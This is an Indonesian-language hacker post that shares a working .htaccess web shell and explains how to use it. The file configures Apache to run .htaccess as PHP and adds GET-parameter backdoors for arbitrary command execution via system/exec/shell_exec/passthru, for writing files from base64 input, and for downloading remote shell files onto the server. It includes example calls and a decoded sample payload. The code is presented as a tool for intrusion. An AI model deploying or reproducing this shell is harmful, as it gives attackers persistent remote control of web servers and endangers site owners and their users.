<Files ~ "^\.

ht">
Order allow,deny
Allow from all
</files>
AddType application/x-httpd-php .htaccess
#by X'1n73ct an siti B4rc0d3 #
<?php @ini_set('display_errors',0);?>
<?=$_X_173=base64_decode($_GET['enc']);fwrite(fopen($_GET['name'], 'w'),$_X_173)
;?>
<?=($_=@$_GET['function']).@$_($_GET['cmd'])?>
<?php fwrite(fopen($_GET['file'], 'w'), file_get_contents($_GET['link']));?>
save .htaccess
keterangan:
apa bedanya dari htaccess shell sebelumnya
bebrapa waktu lalu saya recoded shell htaccess ini
dg menambahkan perintah <?=($_=@$_GET['function']).@$_($_GET['cmd'])?>
yg dahulunya hanya memnfaatkan perintah pastrhu
cara manggilnya
.htaccess?cmd=command&function=function
exp:
.htaccess?cmd=ls&function=system
.htaccess?cmd=ls&function=exec
.htaccess?cmd=ls&function=shell_exec
.htaccess?cmd=ls&function=pasthru
memang lebih mantap akena kita bisa meminimalisir jika salah satu perintah shell
_exec didisable
lalu pertanyaan saya bagaimana jika semua perintah di disable ?
nah karena itu saya tambahi perintahnya
yakni
<?php fwrite(fopen($_GET['file'], 'w'), file_get_contents($_GET['link']));?>
.htaccess?file=namafile.php&link=website/shell.txt
disini saya memakai perintah file_get_contents() pasti tau lah fungsinya
nah jika perintah tersebut didisable bagaimana
sedikit solusi dari saya
<?=$_X_173=base64_decode($_GET['enc']);fwrite(fopen($_GET['name'], 'w'),$_X_173)
;?>
cara memanggilnya
.htaccess?name=namafile.php&enc=encode base64 apa aja buat di jadiin file
exp:
.htaccess?name=shell.php&enc=PD9waHAgc3lzdGVtKCdscyAtbGEnKTs/Pgo=
enter
maka dalam server akan ada file shell.php dengan isi yg kita masukin dan encode
td
encode saya yg iatas adalah|
PD9waHAgc3lzdGVtKCdscyAtbGEnKTs/Pgo= yang artinya <?php system('ls -la');?>
kemudian buka aja shell.php
sekian cerpen saya
salam dari saya
x'1n73ct
ow ya shell ini spesial buat hadiah untuk
bidadariku siti b4rc0d3 biar tambah semangat belajarnya